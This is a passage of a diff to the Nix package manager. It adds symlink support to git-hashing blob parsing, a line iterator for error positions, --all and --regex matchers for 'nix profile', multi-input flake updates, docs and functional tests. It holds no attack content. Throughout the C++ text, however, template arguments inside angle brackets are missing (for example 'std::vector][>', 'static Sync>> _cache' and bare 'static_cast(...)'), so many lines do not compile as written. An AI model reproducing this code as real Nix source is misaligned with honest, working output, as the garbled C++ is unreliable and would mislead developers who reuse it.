+ * with the guarantee that the destination will be “fresh”, with no stale inode
+ * or file descriptor pointing to it).
+ */
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete);
/**
* Automatic cleanup of resources.
diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh
index e996f4ba2..abbaf95b6 100644
--- a/src/libutil/fmt.hh
+++ b/src/libutil/fmt.hh
@@ -8,7 +8,6 @@
namespace nix {
-namespace {
/**
* A helper for writing `boost::format` expressions.
*
@@ -35,14 +34,13 @@ inline void formatHelper(F & f, const T & x, const Args & ... args)
/**
* Set the correct exceptions for `fmt`.
*/
-void setExceptions(boost::format & fmt)
+inline void setExceptions(boost::format & fmt)
{
fmt.exceptions(
boost::io::all_error_bits ^
boost::io::too_many_args_bit ^
boost::io::too_few_args_bit);
}
-}
/**
* A helper for writing a `boost::format` expression to a string.
diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 5733531fa..0b6e35222 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -56,31 +56,63 @@ void parseBlob(
FileSystemObjectSink & sink,
const Path & sinkPath,
Source & source,
- bool executable,
+ BlobMode blobMode,
const ExperimentalFeatureSettings & xpSettings)
{
xpSettings.require(Xp::GitHashing);
- sink.createRegularFile(sinkPath, [&](auto & crf) {
- if (executable)
- crf.isExecutable();
+ unsigned long long size = std::stoi(getStringUntil(source, 0));
- unsigned long long size = std::stoi(getStringUntil(source, 0));
+ auto doRegularFile = [&](bool executable) {
+ sink.createRegularFile(sinkPath, [&](auto & crf) {
+ if (executable)
+ crf.isExecutable();
- crf.preallocateContents(size);
+ crf.preallocateContents(size);
- unsigned long long left = size;
- std::string buf;
- buf.reserve(65536);
+ unsigned long long left = size;
+ std::string buf;
+ buf.reserve(65536);
- while (left) {
+ while (left) {
+ checkInterrupt();
+ buf.resize(std::min((unsigned long long)buf.capacity(), left));
+ source(buf);
+ crf(buf);
+ left -= buf.size();
+ }
+ });
+ };
+
+ switch (blobMode) {
+
+ case BlobMode::Regular:
+ doRegularFile(false);
+ break;
+
+ case BlobMode::Executable:
+ doRegularFile(true);
+ break;
+
+ case BlobMode::Symlink:
+ {
+ std::string target;
+ target.resize(size, '0');
+ target.reserve(size);
+ for (size_t n = 0; n < target.size();) {
checkInterrupt();
- buf.resize(std::min((unsigned long long)buf.capacity(), left));
- source(buf);
- crf(buf);
- left -= buf.size();
+ n += source.read(
+ const_cast<char *>(target.c_str()) + n,
+ target.size() - n);
}
- });
+
+ sink.createSymlink(sinkPath, target);
+ break;
+ }
+
+ default:
+ assert(false);
+ }
}
void parseTree(
@@ -142,7 +174,7 @@ void parse(
FileSystemObjectSink & sink,
const Path & sinkPath,
Source & source,
- bool executable,
+ BlobMode rootModeIfBlob,
std::function hook,
const ExperimentalFeatureSettings & xpSettings)
{
@@ -152,7 +184,7 @@ void parse(
switch (type) {
case ObjectType::Blob:
- parseBlob(sink, sinkPath, source, executable, xpSettings);
+ parseBlob(sink, sinkPath, source, rootModeIfBlob, xpSettings);
break;
case ObjectType::Tree:
parseTree(sink, sinkPath, source, hook, xpSettings);
std::optional<Mode> convertMode(SourceAccessor::Type type)
void restore(FileSystemObjectSink & sink, Source & source, std::function hook)
{
- parse(sink, "", source, false, [&](Path name, TreeEntry entry) {
+ parse(sink, "", source, BlobMode::Regular, [&](Path name, TreeEntry entry) {
auto [accessor, from] = hook(entry.hash);
auto stat = accessor->lstat(from);
auto gotOpt = convertMode(stat.type);
@@ -275,6 +307,13 @@ Mode dump(
}
case SourceAccessor::tSymlink:
+ {
+ auto target = accessor.readLink(path);
+ dumpBlobPrefix(target.size(), sink, xpSettings);
+ sink(target);
+ return Mode::Symlink;
+ }
+
case SourceAccessor::tMisc:
default:
throw Error("file '%1%' has an unsupported type", path);
diff --git a/src/libutil/git.hh b/src/libutil/git.hh
index d9eb138e1..cfea48fbe 100644
--- a/src/libutil/git.hh
+++ b/src/libutil/git.hh
@@ -75,10 +75,23 @@ ObjectType parseObjectType(
Source & source,
const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+/**
+ * These 3 modes are represented by blob objects.
+ *
+ * Sometimes we need this information to disambiguate how a blob is
+ * being used to better match our own "file system object" data model.
+ */
+enum struct BlobMode : RawMode
+{
+ Regular = static_cast(Mode::Regular),
+ Executable = static_cast(Mode::Executable),
+ Symlink = static_cast(Mode::Symlink),
+};
+
void parseBlob(
FileSystemObjectSink & sink, const Path & sinkPath,
Source & source,
- bool executable,
+ BlobMode blobMode,
const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
void parseTree(
@@ -89,11 +102,15 @@ void parseTree(
/**
* Helper putting the previous three `parse*` functions together.
+ *
+ * @rootModeIfBlob How to interpret a root blob, for which there is no
+ * disambiguating dir entry to answer that question. If the root is not
+ * a blob, this is ignored.
*/
void parse(
FileSystemObjectSink & sink, const Path & sinkPath,
Source & source,
- bool executable,
+ BlobMode rootModeIfBlob,
std::function hook,
const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
diff --git a/src/libutil/position.cc b/src/libutil/position.cc
index b39a5a1d4..724e560b7 100644
--- a/src/libutil/position.cc
+++ b/src/libutil/position.cc
@@ -29,32 +29,17 @@ std::optional Pos::getCodeLines() const
return std::nullopt;
if (auto source = getSource()) {
-
- std::istringstream iss(*source);
- // count the newlines.
- int count = 0;
- std::string curLine;
- int pl = line - 1;
-
+ LinesIterator lines(*source), end;
LinesOfCode loc;
- do {
- std::getline(iss, curLine);
- ++count;
- if (count < pl)
- ;
- else if (count == pl) {
- loc.prevLineOfCode = curLine;
- } else if (count == pl + 1) {
- loc.errLineOfCode = curLine;
- } else if (count == pl + 2) {
- loc.nextLineOfCode = curLine;
- break;
- }
-
- if (!iss.good())
- break;
- } while (true);
+ if (line > 1)
+ std::advance(lines, line - 2);
+ if (lines != end && line > 1)
+ loc.prevLineOfCode = *lines++;
+ if (lines != end)
+ loc.errLineOfCode = *lines++;
+ if (lines != end)
+ loc.nextLineOfCode = *lines++;
return loc;
}
@@ -109,4 +94,26 @@ std::ostream & operator<<(std::ostream & str, const Pos & pos)
return str;
}
+void Pos::LinesIterator::bump(bool atFirst)
+{
+ if (!atFirst) {
+ pastEnd = input.empty();
+ if (!input.empty() && input[0] == '\r')
+ input.remove_prefix(1);
+ if (!input.empty() && input[0] == '\n')
+ input.remove_prefix(1);
+ }
+
+ // Nix line endings are not only \n as e.g. std::getline assumes, but also
+ // \r\n **and \r alone**. Not treating them all the same causes error
+ // reports to not match the line numbers the parser expects.
+ auto eol = input.find_first_of("\r\n");
+
+ if (eol > input.size())
+ eol = input.size();
+
+ curLine = input.substr(0, eol);
+ input.remove_prefix(eol);
+}
+
}
diff --git a/src/libutil/position.hh b/src/libutil/position.hh
index a184997ed..9bdf3b4b5 100644
--- a/src/libutil/position.hh
+++ b/src/libutil/position.hh
@@ -67,6 +67,48 @@ struct Pos
bool operator==(const Pos & rhs) const = default;
bool operator!=(const Pos & rhs) const = default;
bool operator<(const Pos & rhs) const;
+
+ struct LinesIterator {
+ using difference_type = size_t;
+ using value_type = std::string_view;
+ using reference = const std::string_view &;
+ using pointer = const std::string_view *;
+ using iterator_category = std::input_iterator_tag;
+
+ LinesIterator(): pastEnd(true) {}
+ explicit LinesIterator(std::string_view input): input(input), pastEnd(input.empty()) {
+ if (!pastEnd)
+ bump(true);
+ }
+
+ LinesIterator & operator++() {
+ bump(false);
+ return *this;
+ }
+ LinesIterator operator++(int) {
+ auto result = *this;
+ ++*this;
+ return result;
+ }
+
+ reference operator*() const { return curLine; }
+ pointer operator->() const { return &curLine; }
+
+ bool operator!=(const LinesIterator & other) const {
+ return !(*this == other);
+ }
+ bool operator==(const LinesIterator & other) const {
+ return (pastEnd && other.pastEnd)
+ || (std::forward_as_tuple(input.size(), input.data())
+ == std::forward_as_tuple(other.input.size(), other.input.data()));
+ }
+
+ private:
+ std::string_view input, curLine;
+ bool pastEnd = false;
+
+ void bump(bool atFirst);
+ };
};
std::ostream & operator<<(std::ostream & str, const Pos & pos);
diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc
index f8ec7fc6b..41c2db59a 100644
--- a/src/libutil/posix-source-accessor.cc
+++ b/src/libutil/posix-source-accessor.cc
@@ -85,16 +85,20 @@ bool PosixSourceAccessor::pathExists(const CanonPath & path)
std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path)
{
- static Sync>> _cache;
+ static Sync>> _cache;
+
+ // Note: we convert std::filesystem::path to Path because the
+ // former is not hashable on libc++.
+ Path absPath = makeAbsPath(path);
{
auto cache(_cache.lock());
- auto i = cache->find(path);
+ auto i = cache->find(absPath);
if (i != cache->end()) return i->second;
}
std::optional st{std::in_place};
- if (::lstat(makeAbsPath(path).c_str(), &*st)) {
+ if (::lstat(absPath.c_str(), &*st)) {
if (errno == ENOENT || errno == ENOTDIR)
st.reset();
else
@@ -103,7 +107,7 @@ std::optional PosixSourceAccessor::cachedLstat(const CanonPath & pa
auto cache(_cache.lock());
if (cache->size() >= 16384) cache->clear();
- cache->emplace(path, st);
+ cache->emplace(absPath, st);
return st;
}
diff --git a/src/libutil/util.cc b/src/libutil/util.cc
index 75bb31c9b..06124bf15 100644
--- a/src/libutil/util.cc
+++ b/src/libutil/util.cc
@@ -9,6 +9,10 @@
#include
+#ifdef NDEBUG
+#error "Nix may not be built with assertions disabled (i.e. with -DNDEBUG)."
+#endif
+
namespace nix {
void initLibUtil() {
diff --git a/src/nix/copy.md b/src/nix/copy.md
index 199006436..6ab7cdee3 100644
--- a/src/nix/copy.md
+++ b/src/nix/copy.md
@@ -11,6 +11,12 @@ R""(
Note the `file://` - without this, the destination is a chroot
store, not a binary cache.
+* Copy all store paths from a local binary cache in `/tmp/cache` to the local store:
+
+ ```console
+ # nix copy --all --from file:///tmp/cache
+ ```
+
* Copy the entire current NixOS system closure to another machine via
SSH:
diff --git a/src/nix/eval.cc b/src/nix/eval.cc
index 2044c8c2b..088be3b17 100644
--- a/src/nix/eval.cc
+++ b/src/nix/eval.cc
@@ -120,8 +120,17 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption
}
else {
- state->forceValueDeep(*v);
- logger->cout("%s", ValuePrinter(*state, *v, PrintOptions { .force = true }));
+ logger->cout(
+ "%s",
+ ValuePrinter(
+ *state,
+ *v,
+ PrintOptions {
+ .force = true,
+ .derivationPaths = true
+ }
+ )
+ );
}
}
};
diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 131589f35..a846f6371 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -88,17 +88,19 @@ public:
expectArgs({
.label="inputs",
.optional=true,
- .handler={[&](std::string inputToUpdate){
- InputPath inputPath;
- try {
- inputPath = flake::parseInputPath(inputToUpdate);
- } catch (Error & e) {
- warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
- throw e;
+ .handler={[&](std::vector inputsToUpdate){
+ for (auto inputToUpdate : inputsToUpdate) {
+ InputPath inputPath;
+ try {
+ inputPath = flake::parseInputPath(inputToUpdate);
+ } catch (Error & e) {
+ warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
+ throw e;
+ }
+ if (lockFlags.inputUpdates.contains(inputPath))
+ warn("Input '%s' was specified multiple times. You may have done this by accident.");
+ lockFlags.inputUpdates.insert(inputPath);
}
- if (lockFlags.inputUpdates.contains(inputPath))
- warn("Input '%s' was specified multiple times. You may have done this by accident.");
- lockFlags.inputUpdates.insert(inputPath);
}},
.completer = {[&](AddCompletions & completions, size_t, std::string_view prefix) {
completeFlakeInputPath(completions, getEvalState(), getFlakeRefsForCompletion(), prefix);
@@ -205,6 +207,9 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
auto lockedFlake = lockFlake();
auto & flake = lockedFlake.flake;
+ // Currently, all flakes are in the Nix store via the rootFS accessor.
+ auto storePath = store->printStorePath(store->toStorePath(flake.path.path.abs()).first);
+
if (json) {
nlohmann::json j;
if (flake.description)
@@ -214,6 +219,8 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
j["resolvedUrl"] = flake.resolvedRef.to_string();
j["resolved"] = fetchers::attrsToJSON(flake.resolvedRef.toAttrs());
j["url"] = flake.lockedRef.to_string(); // FIXME: rename to lockedUrl
+ // "locked" is a misnomer - this is the result of the
+ // attempt to lock.
j["locked"] = fetchers::attrsToJSON(flake.lockedRef.toAttrs());
if (auto rev = flake.lockedRef.input.getRev())
j["revision"] = rev->to_string(HashFormat::Base16, false);
@@ -223,23 +230,24 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
j["revCount"] = *revCount;
if (auto lastModified = flake.lockedRef.input.getLastModified())
j["lastModified"] = *lastModified;
- j["path"] = store->printStorePath(flake.storePath);
+ j["path"] = storePath;
j["locks"] = lockedFlake.lockFile.toJSON().first;
logger->cout("%s", j.dump());
} else {
logger->cout(
ANSI_BOLD "Resolved URL:" ANSI_NORMAL " %s",
flake.resolvedRef.to_string());
- logger->cout(
- ANSI_BOLD "Locked URL:" ANSI_NORMAL " %s",
- flake.lockedRef.to_string());
+ if (flake.lockedRef.input.isLocked())
+ logger->cout(
+ ANSI_BOLD "Locked URL:" ANSI_NORMAL " %s",
+ flake.lockedRef.to_string());
if (flake.description)
logger->cout(
ANSI_BOLD "Description:" ANSI_NORMAL " %s",
*flake.description);
logger->cout(
ANSI_BOLD "Path:" ANSI_NORMAL " %s",
- store->printStorePath(flake.storePath));
+ storePath);
if (auto rev = flake.lockedRef.input.getRev())
logger->cout(
ANSI_BOLD "Revision:" ANSI_NORMAL " %s",
@@ -474,6 +482,8 @@ struct CmdFlakeCheck : FlakeCommand
checkHydraJobs = [&](const std::string & attrPath, Value & v, const PosIdx pos) {
try {
+ Activity act(*logger, lvlInfo, actUnknown,
+ fmt("checking Hydra job '%s'", attrPath));
state->forceAttrs(v, pos, "");
if (state->isDerivation(v))
@@ -1031,7 +1041,9 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
StorePathSet sources;
- sources.insert(flake.flake.storePath);
+ auto storePath = store->toStorePath(flake.flake.path.path.abs()).first;
+
+ sources.insert(storePath);
// FIXME: use graph output, handle cycles.
std::function traverse;
@@ -1043,7 +1055,7 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
auto storePath =
dryRun
? (*inputNode)->lockedRef.input.computeStorePath(*store)
- : (*inputNode)->lockedRef.input.fetch(store).first;
+ : (*inputNode)->lockedRef.input.fetchToStore(store).first;
if (json) {
auto& jsonObj3 = jsonObj2[inputName];
jsonObj3["path"] = store->printStorePath(storePath);
@@ -1060,7 +1072,7 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
if (json) {
nlohmann::json jsonRoot = {
- {"path", store->printStorePath(flake.flake.storePath)},
+ {"path", store->printStorePath(storePath)},
{"inputs", traverse(*flake.lockFile.root)},
};
logger->cout("%s", jsonRoot);
diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md
index 1f6532250..e7e5e0dfb 100644
--- a/src/nix/profile-remove.md
+++ b/src/nix/profile-remove.md
@@ -11,9 +11,16 @@ R""(
* Remove all packages:
```console
- # nix profile remove '.*'
+ # nix profile remove --all
```
+* Remove packages by regular expression:
+
+ ```console
+ # nix profile remove --regex '.*vim.*'
+ ```
+
+
* Remove a package by store path:
```console
diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md
index 432b8fa94..da7a668db 100644
--- a/src/nix/profile-upgrade.md
+++ b/src/nix/profile-upgrade.md
@@ -6,7 +6,7 @@ R""(
reference:
```console
- # nix profile upgrade '.*'
+ # nix profile upgrade --all
```
* Upgrade a specific package by name:
@@ -15,6 +15,12 @@ R""(
# nix profile upgrade hello
```
+* Upgrade all packages that include 'vim' in their name:
+
+ ```console
+ # nix profile upgrade --regex '.*vim.*'
+ ```
+
# Description
This command upgrades a previously installed package in a Nix profile,
diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d39a24d36..a5a40e4f6 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -222,6 +222,8 @@ struct ProfileManifest
es[name] = obj;
}
nlohmann::json json;
+ // Only bump this version number with great care, as changing it can break fresh installs
+ // like in https://github.com/NixOS/nix/issues/10109
json["version"] = 3;
json["elements"] = es;
return json;
@@ -477,55 +479,151 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
}
};
-class MixProfileElementMatchers : virtual Args
+struct Matcher
{
- std::vector _matchers;
+ virtual ~Matcher() { }
+ virtual std::string getTitle() = 0;
+ virtual bool matches(const std::string & name, const ProfileElement & element) = 0;
+};
+
+struct RegexMatcher final : public Matcher
+{
+ std::regex regex;
+ std::string pattern;
+
+ RegexMatcher(const std::string & pattern) : regex(pattern, std::regex::extended | std::regex::icase), pattern(pattern)
+ { }
+
+ std::string getTitle() override
+ {
+ return fmt("Regex '%s'", pattern);
+ }
+
+ bool matches(const std::string & name, const ProfileElement & element) override
+ {
+ return std::regex_match(element.identifier(), regex);
+ }
+};
+
+struct StorePathMatcher final : public Matcher
+{
+ nix::StorePath storePath;
+
+ StorePathMatcher(const nix::StorePath & storePath) : storePath(storePath)
+ { }
+
+ std::string getTitle() override
+ {
+ return fmt("Store path '%s'", storePath.to_string());
+ }
+
+ bool matches(const std::string & name, const ProfileElement & element) override
+ {
+ return element.storePaths.count(storePath);
+ }
+};
+
+struct NameMatcher final : public Matcher
+{
+ std::string name;
+
+ NameMatcher(const std::string & name) : name(name)
+ { }
+
+ std::string getTitle() override
+ {
+ return fmt("Package name '%s'", name);
+ }
+
+ bool matches(const std::string & name, const ProfileElement & element) override
+ {
+ return name == this->name;
+ }
+};
+
+struct AllMatcher final : public Matcher
+{
+ std::string getTitle() override
+ {
+ return "--all";
+ }
+
+ bool matches(const std::string & name, const ProfileElement & element) override
+ {
+ return true;
+ }
+};
+
+AllMatcher all;
+
+class MixProfileElementMatchers : virtual Args, virtual StoreCommand
+{
+ std::vector][> _matchers;
public:
MixProfileElementMatchers()
{
- expectArgs("elements", &_matchers);
+ addFlag({
+ .longName = "all",
+ .description = "Match all packages in the profile.",
+ .handler = {[this]() {
+ _matchers.push_back(ref(std::shared_ptr(&all, [](AllMatcher*) {})));
+ }},
+ });
+ addFlag({
+ .longName = "regex",
+ .description = "A regular expression to match one or more packages in the profile.",
+ .labels = {"pattern"},
+ .handler = {[this](std::string arg) {
+ _matchers.push_back(make_ref(arg));
+ }},
+ });
+ expectArgs({
+ .label = "elements",
+ .optional = true,
+ .handler = {[this](std::vector args) {
+ for (auto & arg : args) {
+ if (auto n = string2Int(arg)) {
+ throw Error("'nix profile' no longer supports indices ('%d')", *n);
+ } else if (getStore()->isStorePath(arg)) {
+ _matchers.push_back(make_ref(getStore()->parseStorePath(arg)));
+ } else {
+ _matchers.push_back(make_ref(arg));
+ }
+ }
+ }}
+ });
}
- struct RegexPattern {
- std::string pattern;
- std::regex reg;
- };
- typedef std::variant Matcher;
-
- std::vector getMatchers(ref store)
- {
- std::vector res;
-
- for (auto & s : _matchers) {
- if (auto n = string2Int(s))
- throw Error("'nix profile' no longer supports indices ('%d')", *n);
- else if (store->isStorePath(s))
- res.push_back(s);
- else
- res.push_back(RegexPattern{s,std::regex(s, std::regex::extended | std::regex::icase)});
+ std::set getMatchingElementNames(ProfileManifest & manifest) {
+ if (_matchers.empty()) {
+ throw UsageError("No packages specified.");
}
- return res;
- }
+ if (std::find_if(_matchers.begin(), _matchers.end(), [](const ref & m) { return m.dynamic_pointer_cast(); }) != _matchers.end() && _matchers.size() > 1) {
+ throw UsageError("--all cannot be used with package names or regular expressions.");
+ }
- bool matches(
- const Store & store,
- const std::string & name,
- const ProfileElement & element,
- const std::vector & matchers)
- {
- for (auto & matcher : matchers) {
- if (auto path = std::get_if(&matcher)) {
- if (element.storePaths.count(store.parseStorePath(*path))) return true;
- } else if (auto regex = std::get_if(&matcher)) {
- if (std::regex_match(name, regex->reg))
- return true;
+ if (manifest.elements.empty()) {
+ warn("There are no packages in the profile.");
+ return {};
+ }
+
+ std::set result;
+ for (auto & matcher : _matchers) {
+ bool foundMatch = false;
+ for (auto & [name, element] : manifest.elements) {
+ if (matcher->matches(name, element)) {
+ result.insert(name);
+ foundMatch = true;
+ }
+ }
+ if (!foundMatch) {
+ warn("%s does not match any packages in the profile.", matcher->getTitle());
}
}
-
- return false;
+ return result;
}
};
@@ -547,16 +645,19 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem
{
ProfileManifest oldManifest(*getEvalState(), *profile);
- auto matchers = getMatchers(store);
+ ProfileManifest newManifest = oldManifest;
- ProfileManifest newManifest;
+ auto matchingElementNames = getMatchingElementNames(oldManifest);
- for (auto & [name, element] : oldManifest.elements) {
- if (!matches(*store, name, element, matchers)) {
- newManifest.elements.insert_or_assign(name, std::move(element));
- } else {
- notice("removing '%s'", element.identifier());
- }
+ if (matchingElementNames.empty()) {
+ warn ("No packages to remove. Use 'nix profile list' to see the current profile.");
+ return;
+ }
+
+ for (auto & name : matchingElementNames) {
+ auto & element = oldManifest.elements[name];
+ notice("removing '%s'", element.identifier());
+ newManifest.elements.erase(name);
}
auto removedCount = oldManifest.elements.size() - newManifest.elements.size();
@@ -564,16 +665,6 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem
removedCount,
newManifest.elements.size());
- if (removedCount == 0) {
- for (auto matcher: matchers) {
- if (const Path * path = std::get_if(&matcher)) {
- warn("'%s' does not match any paths", *path);
- } else if (const RegexPattern * regex = std::get_if(&matcher)) {
- warn("'%s' does not match any packages", regex->pattern);
- }
- }
- warn ("Use 'nix profile list' to see the current profile.");
- }
updateProfile(newManifest.build(store));
}
};
@@ -596,20 +687,20 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
{
ProfileManifest manifest(*getEvalState(), *profile);
- auto matchers = getMatchers(store);
-
Installables installables;
std::vector elems;
- auto matchedCount = 0;
auto upgradedCount = 0;
- for (auto & [name, element] : manifest.elements) {
- if (!matches(*store, name, element, matchers)) {
- continue;
- }
+ auto matchingElementNames = getMatchingElementNames(manifest);
- matchedCount++;
+ if (matchingElementNames.empty()) {
+ warn("No packages to upgrade. Use 'nix profile list' to see the current profile.");
+ return;
+ }
+
+ for (auto & name : matchingElementNames) {
+ auto & element = manifest.elements[name];
if (!element.source) {
warn(
@@ -648,7 +739,9 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
assert(infop);
auto & info = *infop;
- if (element.source->lockedRef == info.flake.lockedRef) continue;
+ if (info.flake.lockedRef.input.isLocked()
+ && element.source->lockedRef == info.flake.lockedRef)
+ continue;
printInfo("upgrading '%s' from flake '%s' to '%s'",
element.source->attrPath, element.source->lockedRef, info.flake.lockedRef);
@@ -665,18 +758,8 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
}
if (upgradedCount == 0) {
- if (matchedCount == 0) {
- for (auto & matcher : matchers) {
- if (const Path * path = std::get_if(&matcher)) {
- warn("'%s' does not match any paths", *path);
- } else if (const RegexPattern * regex = std::get_if(&matcher)) {
- warn("'%s' does not match any packages", regex->pattern);
- }
- }
- } else {
- warn("Found some packages but none of them could be upgraded.");
- }
- warn ("Use 'nix profile list' to see the current profile.");
+ warn("Found some packages but none of them could be upgraded.");
+ return;
}
auto builtPaths = builtPathsPerInstallable(
diff --git a/src/nix/registry-pin.md b/src/nix/registry-pin.md
index ebc0e3eff..5ad4f8709 100644
--- a/src/nix/registry-pin.md
+++ b/src/nix/registry-pin.md
@@ -15,10 +15,10 @@ R""(
user flake:nixpkgs github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
```
- and `nix flake info` will say:
+ and `nix flake metadata` will say:
```console
- # nix flake info nixpkgs
+ # nix flake metadata nixpkgs
Resolved URL: github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
Locked URL: github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
…
diff --git a/src/nix/registry.cc b/src/nix/registry.cc
index 0346ec1e0..812429240 100644
--- a/src/nix/registry.cc
+++ b/src/nix/registry.cc
@@ -188,7 +188,9 @@ struct CmdRegistryPin : RegistryCommand, EvalCommand
auto ref = parseFlakeRef(url);
auto lockedRef = parseFlakeRef(locked);
registry->remove(ref.input);
- auto [tree, resolved] = lockedRef.resolve(store).input.fetch(store);
+ auto resolved = lockedRef.resolve(store).input.getAccessor(store).second;
+ if (!resolved.isLocked())
+ warn("flake '%s' is not locked", resolved.to_string());
fetchers::Attrs extraAttrs;
if (ref.subdir != "") extraAttrs["dir"] = ref.subdir;
registry->add(ref.input, resolved, extraAttrs);
diff --git a/tests/functional/common/vars-and-functions.sh.in b/tests/functional/common/vars-and-functions.sh.in
index 8fef29f97..3975986c0 100644
--- a/tests/functional/common/vars-and-functions.sh.in
+++ b/tests/functional/common/vars-and-functions.sh.in
@@ -216,6 +216,17 @@ expectStderr() {
return 0
}
+# Run a command and check whether its stderr matches the text supplied on stdin.
+# Show a diff when output does not match.
+# Usage:
+#
+# assertStderr nix profile remove nothing << EOF
+# error: This error is expected
+# EOF
+assertStderr() {
+ diff -u /dev/stdin <($@ 2>/dev/null 2>&1)
+}
+
needLocalStore() {
if [[ "$NIX_REMOTE" == "daemon" ]]; then
skipTest "Can’t run through the daemon ($1)"
diff --git a/tests/functional/eval.sh b/tests/functional/eval.sh
index b81bb1e2c..c6a475cd0 100644
--- a/tests/functional/eval.sh
+++ b/tests/functional/eval.sh
@@ -41,3 +41,14 @@ mkdir -p $TEST_ROOT/xyzzy $TEST_ROOT/foo
ln -sfn ../xyzzy $TEST_ROOT/foo/bar
printf 123 > $TEST_ROOT/xyzzy/default.nix
[[ $(nix eval --impure --expr "import $TEST_ROOT/foo/bar") = 123 ]]
+
+# Test --arg-from-file.
+[[ "$(nix eval --raw --arg-from-file foo config.nix --expr '{ foo }: { inherit foo; }' foo)" = "$(cat config.nix)" ]]
+
+# Check that special(-ish) files are drained.
+if [[ -e /proc/version ]]; then
+ [[ "$(nix eval --raw --arg-from-file foo /proc/version --expr '{ foo }: { inherit foo; }' foo)" = "$(cat /proc/version)" ]]
+fi
+
+# Test --arg-from-stdin.
+[[ "$(echo bla | nix eval --raw --arg-from-stdin foo --expr '{ foo }: { inherit foo; }' foo)" = bla ]]
diff --git a/tests/functional/flakes/flakes.sh b/tests/functional/flakes/flakes.sh
index 7506b6b3b..427290883 100644
--- a/tests/functional/flakes/flakes.sh
+++ b/tests/functional/flakes/flakes.sh
@@ -564,6 +564,16 @@ nix flake lock "$flake3Dir"
nix flake update flake2/flake1 --flake "$flake3Dir"
[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+# Test updating multiple inputs.
+nix flake lock "$flake3Dir" --override-input flake1 flake1/master/$hash1
+nix flake lock "$flake3Dir" --override-input flake2/flake1 flake1/master/$hash1
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+
+nix flake update flake1 flake2/flake1 --flake "$flake3Dir"
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+
# Test 'nix flake metadata --json'.
nix flake metadata "$flake3Dir" --json | jq .
diff --git a/tests/functional/flakes/search-root.sh b/tests/functional/flakes/search-root.sh
index d8586dc8a..6b137aa86 100644
--- a/tests/functional/flakes/search-root.sh
+++ b/tests/functional/flakes/search-root.sh
@@ -22,7 +22,7 @@ mkdir subdir
pushd subdir
success=("" . .# .#test ../subdir ../subdir#test "$PWD")
-failure=("path:$PWD")
+failure=("path:$PWD" "../simple.nix")
for i in "${success[@]}"; do
nix build $i || fail "flake should be found by searching up directories"
diff --git a/tests/functional/git-hashing/simple.sh b/tests/functional/git-hashing/simple.sh
index 74b0220f8..604e1a175 100644
--- a/tests/functional/git-hashing/simple.sh
+++ b/tests/functional/git-hashing/simple.sh
@@ -56,3 +56,12 @@ echo Run Hello World! > $TEST_ROOT/dummy3/dir/executable
path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
hash3=$(nix-store -q --hash $path3)
test "$hash3" = "sha256:08y3nm3mvn9qvskqnf13lfgax5lh73krxz4fcjd5cp202ggpw9nv"
+
+rm -rf $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3/dir
+touch $TEST_ROOT/dummy3/dir/file
+ln -s './hello/world.txt' $TEST_ROOT/dummy3/dir/symlink
+path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
+hash3=$(nix-store -q --hash $path3)
+test "$hash3" = "sha256:1dwazas8irzpar89s8k2bnp72imfw7kgg4aflhhsfnicg8h428f3"
diff --git a/tests/functional/help.sh b/tests/functional/help.sh
new file mode 100644
index 000000000..868f5d2e9
--- /dev/null
+++ b/tests/functional/help.sh
@@ -0,0 +1,69 @@
+source common.sh
+
+clearStore
+
+# test help output
+
+nix-build --help
+nix-shell --help
+
+nix-env --help
+nix-env --install --help
+nix-env --upgrade --help
+nix-env --uninstall --help
+nix-env --set --help
+nix-env --set-flag --help
+nix-env --query --help
+nix-env --switch-profile --help
+nix-env --list-generations --help
+nix-env --delete-generations --help
